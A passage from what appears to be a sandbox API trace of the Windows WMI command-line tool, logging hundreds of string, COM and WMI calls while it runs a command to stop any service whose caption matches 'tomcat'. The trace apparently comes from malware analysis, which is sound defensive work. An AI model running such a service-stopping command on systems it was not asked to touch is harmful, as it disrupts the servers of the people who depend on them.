CALL STOPSERVICE") returned 58 [0110.514] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.514] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.514] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.514] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.514] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.514] lstrlenW (lpString="SERVICE") returned 7 [0110.514] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0110.514] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.514] lstrlenW (lpString="WHERE") returned 5 [0110.514] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0110.514] memmove_s (in: _Destination=0x1072c78, _DestinationSize=0x4, _Source=0x1072c68, _SourceSize=0x4 | out: _Destination=0x1072c78) returned 0x0 [0110.515] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.515] lstrlenW (lpString="'caption LIKE '%tomcat%''") returned 25 [0110.515] _wcsicmp (_String1="'caption LIKE '%tomcat%''", _String2="\"NULL\"") returned 5 [0110.515] lstrlenW (lpString="'caption LIKE '%tomcat%''") returned 25 [0110.515] lstrlenW (lpString="'caption LIKE '%tomcat%''") returned 25 [0110.515] memmove_s (in: _Destination=0x1077d70, _DestinationSize=0x8, _Source=0x1072c78, _SourceSize=0x8 | out: _Destination=0x1077d70) returned 0x0 [0110.515] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.515] lstrlenW (lpString="CALL") returned 4 [0110.515] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0110.515] memmove_s (in: _Destination=0x1077f68, _DestinationSize=0xc, _Source=0x1077d70, _SourceSize=0xc | out: _Destination=0x1077f68) returned 0x0 [0110.515] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE") returned 58 [0110.515] lstrlenW (lpString="STOPSERVICE") returned 11 [0110.515] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0110.515] memmove_s (in: _Destination=0x1072478, _DestinationSize=0x10, _Source=0x1077f68, _SourceSize=0x10 | out: _Destination=0x1072478) returned 0x0 [0110.515] lstrlenW (lpString="QUIT") returned 4 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0110.515] lstrlenW (lpString="EXIT") returned 4 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0110.515] WbemLocator:IUnknown:AddRef (This=0x1096a98) returned 0x2 [0110.515] lstrlenW (lpString="/") returned 1 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0110.515] lstrlenW (lpString="-") returned 1 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0110.515] lstrlenW (lpString="CLASS") returned 5 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0110.515] lstrlenW (lpString="PATH") returned 4 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0110.515] lstrlenW (lpString="CONTEXT") returned 7 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.515] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.515] lstrlenW (lpString="SERVICE") returned 7 [0110.516] GetCurrentThreadId () returned 0xdfc [0110.516] ??0CHString@@QAE@XZ () returned 0xd6f5d0 [0110.516] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1096a98, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x10c0690) returned 0x0 [0110.538] CoSetProxyBlanket (pProxy=0x10c0690, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0110.538] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.538] GetCurrentThreadId () returned 0xdfc [0110.538] ??0CHString@@QAE@XZ () returned 0xd6f578 [0110.538] SysStringLen (param_1="root\\cli") returned 0x8 [0110.538] SysStringLen (param_1="\\") returned 0x1 [0110.538] SysStringLen (param_1="root\\cli\\") returned 0x9 [0110.538] SysStringLen (param_1="ms_409") returned 0x6 [0110.539] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1096a98, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x10c0dc0) returned 0x0 [0110.547] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.547] GetCurrentThreadId () returned 0xdfc [0110.547] ??0CHString@@QAE@XZ () returned 0xd6f5d4 [0110.547] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0110.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x1078a00, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0110.547] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0110.547] SysStringLen (param_1="SERVICE") returned 0x7 [0110.547] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0110.547] SysStringLen (param_1="'") returned 0x1 [0110.547] IWbemServices:GetObject (in: This=0x10c0690, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xd6f5d0*=0x0, ppCallResult=0x0 | out: ppObject=0xd6f5d0*=0x10e4740, ppCallResult=0x0) returned 0x0 [0110.554] IWbemClassObject:Get (in: This=0x10e4740, wszName="Target", lFlags=0, pVal=0xd6f5a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.554] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0110.554] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0110.554] IWbemClassObject:Get (in: This=0x10e4740, wszName="PWhere", lFlags=0, pVal=0xd6f5a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f5a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.554] lstrlenW (lpString="WHERE Name='#'") returned 14 [0110.554] lstrlenW (lpString="WHERE Name='#'") returned 14 [0110.554] IWbemClassObject:Get (in: This=0x10e4740, wszName="Connection", lFlags=0, pVal=0xd6f5a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f5a8*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10e5308, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.554] IUnknown:QueryInterface (in: This=0x10e5308, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd6f5c4 | out: ppvObject=0xd6f5c4*=0x10e5308) returned 0x0 [0110.554] GetCurrentThreadId () returned 0xdfc [0110.555] ??0CHString@@QAE@XZ () returned 0xd6f544 [0110.555] IWbemClassObject:Get (in: This=0x10e5308, wszName="Namespace", lFlags=0, pVal=0xd6f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.555] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0110.555] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0110.555] IWbemClassObject:Get (in: This=0x10e5308, wszName="Locale", lFlags=0, pVal=0xd6f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10c7344, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.555] lstrlenW (lpString="ms_409") returned 6 [0110.555] lstrlenW (lpString="ms_409") returned 6 [0110.555] IWbemClassObject:Get (in: This=0x10e5308, wszName="User", lFlags=0, pVal=0xd6f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10c7344, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f528*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.555] IWbemClassObject:Get (in: This=0x10e5308, wszName="Password", lFlags=0, pVal=0xd6f528*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f528*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.555] IWbemClassObject:Get (in: This=0x10e5308, wszName="Server", lFlags=0, pVal=0xd6f528*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f528*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.555] lstrlenW (lpString=".") returned 1 [0110.555] lstrlenW (lpString=".") returned 1 [0110.555] IWbemClassObject:Get (in: This=0x10e5308, wszName="Authority", lFlags=0, pVal=0xd6f528*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10c7344, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f528*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.555] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.555] IUnknown:Release (This=0x10e5308) returned 0x1 [0110.555] GetCurrentThreadId () returned 0xdfc [0110.555] ??0CHString@@QAE@XZ () returned 0xd6f534 [0110.555] IWbemClassObject:Get (in: This=0x10e4740, wszName="__RELPATH", lFlags=0, pVal=0xd6f51c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f51c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.556] GetCurrentThreadId () returned 0xdfc [0110.556] ??0CHString@@QAE@XZ () returned 0xd6f4b0 [0110.556] ??0CHString@@QAE@PBG@Z () returned 0xd6f4ac [0110.556] ??0CHString@@QAE@ABV0@@Z () returned 0xd6f42c [0110.556] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0110.556] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x1078a00 [0110.556] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0110.556] ?Left@CHString@@QBE?AV1@H@Z () returned 0xd6f424 [0110.556] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xd6f428 [0110.556] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xd6f4ac [0110.556] ??1CHString@@QAE@XZ () returned 0x1 [0110.556] ??1CHString@@QAE@XZ () returned 0x1 [0110.556] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xd6f420 [0110.556] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xd6f42c [0110.556] ??1CHString@@QAE@XZ () returned 0x1 [0110.556] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x1078a60 [0110.556] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0110.556] ?Left@CHString@@QBE?AV1@H@Z () returned 0xd6f424 [0110.556] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xd6f428 [0110.556] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xd6f4ac [0110.556] ??1CHString@@QAE@XZ () returned 0x1 [0110.556] ??1CHString@@QAE@XZ () returned 0x1 [0110.556] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xd6f420 [0110.556] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xd6f42c [0110.556] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.556] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0110.556] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.556] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0110.556] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0110.556] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0110.556] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0110.556] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0110.556] SysStringLen (param_1="\"") returned 0x1 [0110.557] IWbemServices:GetObject (in: This=0x10c0dc0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xd6f4bc*=0x0, ppCallResult=0x0 | out: ppObject=0xd6f4bc*=0x10e56e8, ppCallResult=0x0) returned 0x0 [0110.559] IWbemClassObject:Get (in: This=0x10e56e8, wszName="Text", lFlags=0, pVal=0xd6f488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6f488*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10cf2f0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x10c3788, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.559] SafeArrayGetLBound (in: psa=0x10cf2f0, nDim=0x1, plLbound=0xd6f498 | out: plLbound=0xd6f498) returned 0x0 [0110.559] SafeArrayGetUBound (in: psa=0x10cf2f0, nDim=0x1, plUbound=0xd6f49c | out: plUbound=0xd6f49c) returned 0x0 [0110.559] SafeArrayGetElement (in: psa=0x10cf2f0, rgIndices=0xd6f4b4, pv=0xd6f4a0 | out: pv=0xd6f4a0) returned 0x0 [0110.559] SysStringLen (param_1="Service application management. ") returned 0x20 [0110.559] IUnknown:Release (This=0x10e56e8) returned 0x0 [0110.559] ??1CHString@@QAE@XZ () returned 0x1 [0110.559] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.559] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.559] lstrlenW (lpString="Service application management. ") returned 32 [0110.559] lstrlenW (lpString="Service application management. ") returned 32 [0110.559] IUnknown:Release (This=0x10e4740) returned 0x0 [0110.560] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.560] lstrlenW (lpString="PATH") returned 4 [0110.560] lstrlenW (lpString="WHERE") returned 5 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0110.560] lstrlenW (lpString="WHERE") returned 5 [0110.560] lstrlenW (lpString="WHERE") returned 5 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0110.560] lstrlenW (lpString="/") returned 1 [0110.560] lstrlenW (lpString="caption LIKE '%tomcat%'") returned 23 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%tomcat%'", cchCount1=23, lpString2="/", cchCount2=1) returned 3 [0110.560] lstrlenW (lpString="-") returned 1 [0110.560] lstrlenW (lpString="caption LIKE '%tomcat%'") returned 23 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%tomcat%'", cchCount1=23, lpString2="-", cchCount2=1) returned 3 [0110.560] lstrlenW (lpString="caption LIKE '%tomcat%'") returned 23 [0110.560] lstrlenW (lpString="caption LIKE '%tomcat%'") returned 23 [0110.560] lstrlenW (lpString="/") returned 1 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0110.560] lstrlenW (lpString="-") returned 1 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] lstrlenW (lpString="GET") returned 3 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0110.560] lstrlenW (lpString="LIST") returned 4 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0110.560] lstrlenW (lpString="SET") returned 3 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0110.560] lstrlenW (lpString="CREATE") returned 6 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] lstrlenW (lpString="CALL") returned 4 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0110.560] lstrlenW (lpString="/") returned 1 [0110.560] lstrlenW (lpString="STOPSERVICE") returned 11 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0110.560] lstrlenW (lpString="-") returned 1 [0110.560] lstrlenW (lpString="STOPSERVICE") returned 11 [0110.560] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0110.560] lstrlenW (lpString="STOPSERVICE") returned 11 [0110.560] lstrlenW (lpString="STOPSERVICE") returned 11 [0110.560] GetCurrentThreadId () returned 0xdfc [0110.561] ??0CHString@@QAE@XZ () returned 0xd6ed3c [0110.561] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0110.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x1078a88, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0110.561] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0110.561] SysStringLen (param_1="SERVICE") returned 0x7 [0110.561] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0110.561] SysStringLen (param_1="'") returned 0x1 [0110.561] IWbemServices:GetObject (in: This=0x10c0690, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xd6ed18*=0x0, ppCallResult=0x0 | out: ppObject=0xd6ed18*=0x10e4740, ppCallResult=0x0) returned 0x0 [0110.566] lstrlenW (lpString="CALL") returned 4 [0110.566] lstrlenW (lpString="CALL") returned 4 [0110.566] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0110.566] IWbemClassObject:Get (in: This=0x10e4740, wszName="Verbs", lFlags=0, pVal=0xd6ecd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6ecd0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10cf500*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x10cf400, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.567] SafeArrayGetLBound (in: psa=0x10cf500, nDim=0x1, plLbound=0xd6ece0 | out: plLbound=0xd6ece0) returned 0x0 [0110.567] SafeArrayGetUBound (in: psa=0x10cf500, nDim=0x1, plUbound=0xd6ece8 | out: plUbound=0xd6ece8) returned 0x0 [0110.567] SafeArrayGetElement (in: psa=0x10cf500, rgIndices=0xd6ecf0, pv=0xd6ed24 | out: pv=0xd6ed24) returned 0x0 [0110.567] IWbemClassObject:Get (in: This=0x10e6910, wszName="Name", lFlags=0, pVal=0xd6ecc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6ecc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.568] lstrlenW (lpString="StartService") returned 12 [0110.568] lstrlenW (lpString="STOPSERVICE") returned 11 [0110.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0110.568] IUnknown:Release (This=0x10e6910) returned 0x1 [0110.568] SafeArrayGetElement (in: psa=0x10cf500, rgIndices=0xd6ecf0, pv=0xd6ed24 | out: pv=0xd6ed24) returned 0x0 [0110.568] IWbemClassObject:Get (in: This=0x10e6e40, wszName="Name", lFlags=0, pVal=0xd6ecc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6ecc0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.568] lstrlenW (lpString="StopService") returned 11 [0110.568] lstrlenW (lpString="STOPSERVICE") returned 11 [0110.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0110.568] GetCurrentThreadId () returned 0xdfc [0110.568] ??0CHString@@QAE@XZ () returned 0xd6eb3c [0110.568] IWbemClassObject:Get (in: This=0x10e6e40, wszName="Description", lFlags=0, pVal=0xd6eb0c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6eb0c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.568] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.568] IWbemClassObject:Get (in: This=0x10e6e40, wszName="Parameters", lFlags=0, pVal=0xd6ecb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6ecb0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.568] IWbemClassObject:Get (in: This=0x10e6e40, wszName="VerbType", lFlags=0, pVal=0xd6ec48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6ec48*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.568] IWbemClassObject:Get (in: This=0x10e6e40, wszName="Derivation", lFlags=0, pVal=0xd6ec30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xd6ec30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0110.568] lstrlenW (lpString="StopService") returned 11 [0110.568] lstrlenW (lpString="StopService") returned 11 [0110.569] IUnknown:Release (This=0x10e6e40) returned 0x1 [0110.569] IUnknown:Release (This=0x10e4740) returned 0x0 [0110.569] ??1CHString@@QAE@XZ () returned 0x74a66430 [0110.569] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0110.570] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0110.570] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x7a9d7463 | out: _String="Select", _Context=0x7a9d7463) returned="Select" [0110.570] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d7463 | out: _String=0x0, _Context=0x7a9d7463) returned="*" [0110.570] lstrlenW (lpString="FROM") returned 4 [0110.570] lstrlenW (lpString="*") returned 1 [0110.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0110.570] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d7463 | out: _String=0x0, _Context=0x7a9d7463) returned="from" [0110.570] lstrlenW (lpString="FROM") returned 4 [0110.570] lstrlenW (lpString="from") returned 4 [0110.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0110.570] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x7a9d7463 | out: _String=0x0, _Context=0x7a9d7463) returned="Win32_Service" [0110.570] lstrlenW (lpString="SET") returned 3 [0110.570] lstrlenW (lpString="CALL") returned 4 [0110.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0110.570] lstrlenW (lpString="CREATE") returned 6 [0110.570] lstrlenW (lpString="CALL") returned 4 [0110.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0110.570] lstrlenW (lpString="GET") returned 3 [0110.570] lstrlenW (lpString="CALL") returned 4 [0110.570] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0110.570] lstrlenW (lpString="LIST") returned 4 [0110.570] 